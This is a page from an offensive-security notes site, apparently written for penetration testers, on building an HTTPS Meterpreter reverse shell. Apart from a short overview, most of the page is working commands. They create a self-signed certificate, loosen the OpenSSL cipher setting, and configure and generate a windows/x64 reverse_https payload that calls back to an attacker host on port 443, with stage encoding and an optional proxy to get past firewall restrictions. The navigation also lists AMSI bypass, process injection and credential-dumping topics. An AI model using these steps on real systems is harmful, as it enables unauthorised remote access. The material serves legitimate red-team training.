RFC - Offensive Security Notes
  • Active Directory
    • Enumeration
      • Active Directory Module
        • Enumerating the Domain
        • Enumerating ACLs
      • PowerView 3.0
      • Verify connectivity to domain controller
      • WMI domain enumeration through root\directory\ldap
      • PAM Trust
      • DNS discovery
        • Get-DnsServerZone
    • Privilege Escalation
      • Kerberos Delegation
        • Unconstrained delegation
        • Constrained delegation
        • Resource-based Constrained Delegation
      • Escalating from child to parent domain
      • Abusing inter-forest trust
      • WSUS server abuse
      • ACL Enumeration with PowerView 2.0
    • Persistence
      • Kerberos attacks
        • Golden ticket
        • Silver ticket
      • DSRM (Directory Services Restore Mode)
  • Initial Access
    • VBA Macros
      • Mark-of-the-Web
  • Discovery
    • Juicy files
      • PowerShell history
    • Network Enumeration
      • Network discovery scans
        • Ping scan
      • Nmap
      • Perimeter firewall scanning for open outbound ports
  • Execution
    • WMI
      • Remote code execution using WMI
    • PowerShell
      • C# assembly in PowerShell
        • List load assembly
        • Add-Type
        • UnsafeNativeMethods
        • DelegateType Reflection
        • Reflective Load
    • C# .Net Assembly
      • Process injection
        • Debugging
        • Using VirtualAllocEx and WriteProcessMemory
        • Using NTAPI Undocumented Functions
    • ReverseShells
      • Linux
        • Stabilizing zsh shell
    • Metasploit
      • HTTPs Meterpreter
  • Exploitation
    • Win32 APIs
      • OpenProcess
      • VirtualAllocEx
      • WriteProcessMemory
      • CreateRemoteThread
  • Credential Access
    • Microsoft Windows
      • Windows credential audit and logon types
      • Local credentials (SAM and LSA)
      • Lsass from forensics dump
      • Access Tokens
        • SeImpersonatePrivilege
      • ntds.dit
        • Dumping the contents of ntds.dit files using PowerShell
      • Mimikatz
      • LAPS
  • Lateral Movement
    • Windows Lateral Movement
      • Remote Desktop Protocol (RDP)
      • PowerShell Remoting (PS Remote)
        • Kerberos double hoping
      • Windows Task Scheduler
    • Linux Lateral Movement
  • Persistence
  • Defence Evasion
    • Antimalware Scan Interface (AMSI)
      • Debugging AMSI with Frida
      • PowerShell Bypasses
      • JS/VBA Bypasses
    • PowerShell
      • PowerShell version 2
      • Constrained Language Mode
      • Just Enough Administration (JEA)
      • ScriptBlockLogging
    • Microsoft Defender
    • Anti-virus evasion
      • Evasion and bypassing detection within C#
        • Encryptors
          • Aes encryptor
        • Sandbox evasion
          • Time accelerated checks
    • AppLocker
      • InstallUtil
      • MsBuild
  • Network Pivoting
    • Proxies and port fowarding
      • SSH
      • Metasploit
      • Socat
      • SSH Shuttle
      • Windows netsh command
    • Network discovery and scanning
  • Exfiltration
    • Windows
      • Copy files over SMB
  • Services
    • MS SQL Server
      • Enumeration
      • UNC Path Injection
      • Privilege Escalation
      • Linked Servers
      • SQL Injection
  • Misc
    • CrackMapExec
    • Cheat sheets
  • Cloud
    • Azure
      • Authentication
      • Enumeration
        • AzureHound
        • Az.Powershell
        • Microsoft Graph PowerShell
      • Initial Access
        • Device Code Phishing
        • Family-Of-Client-Ids - FOCI
        • JWT Assertion
Powered by GitBook
On this page
  • Overview
  • Generating your own self signed certificate
  • Msfconsole generate payload
  • References
  1. Execution
  2. Metasploit

HTTPs Meterpreter

Overview

HTTPs Meterpreter is a type of Meterpreter shell that uses HTTPs protocol for communication between the attacker and the target system. This type of shell is commonly used in situations where the attacker needs to bypass firewall or network restrictions that may prevent other types of shells, such as reverse TCP or bind TCP, from working properly.

Generating your own self signed certificate

To generate your own self signed certificate: 

openssl req -new -x509 -nodes -out cert.crt -keyout priv.key

In order for the Metasploit to use the cert we will concatinate the private and public key to create us a .pem file

cat priv.key cert.crt > rfc.pem

We also must change the CipherString in the /etc/ssl/openssl.cnf config file or our reverse HTTPS shell will not work properly.

First, we will locate this line in the config file:

CipherString=DEFAULT@SECLEVEL=2

and change to to:

CipherString=DEFAULT

Finally, we can set it in our Metasploit instance: 

set StagerVerifySSLCert true
set HandlerSSLCert /home/kali/self_cert/rfc.pem

Msfconsole generate payload

To generate a Meterpreter payload:

msf6 > use windows/x64/meterpreter/reverse_https
msf6 payload(windows/x64/meterpreter/reverse_https) > set LHOST tun0
LHOST => 192.168.45.5
msf6 payload(windows/x64/meterpreter/reverse_https) > set LPORT 443
LPORT => 443
msf6 payload(windows/x64/meterpreter/reverse_https) > set StagerVerifySSLCert true
StagerVerifySSLCert => true 
msf6 payload(windows/x64/meterpreter/reverse_https) > set HandlerSSLCert ../../payloads/SpaceX.pem
handlersslcert => ../../payloads/SpaceX.pem
msf6 exploit(multi/handler) > set EnableStageEncoding true
EnableStageEncoding => true

## optional proxy
msf6 exploit(multi/handler) > set HttpProxyHost 172.16.20.50
HttpProxyHost => 172.16.20.50
msf6 exploit(multi/handler) > set HttpProxyPort 8080
HttpProxyPort => 8080

msf6 payload(windows/x64/meterpreter/reverse_https) > generate -f raw -o spacex.bin

References

PreviousMetasploitNextWin32 APIs

Last updated 1 year ago

MeterpreterPentester's Promiscuous Notebook
Logo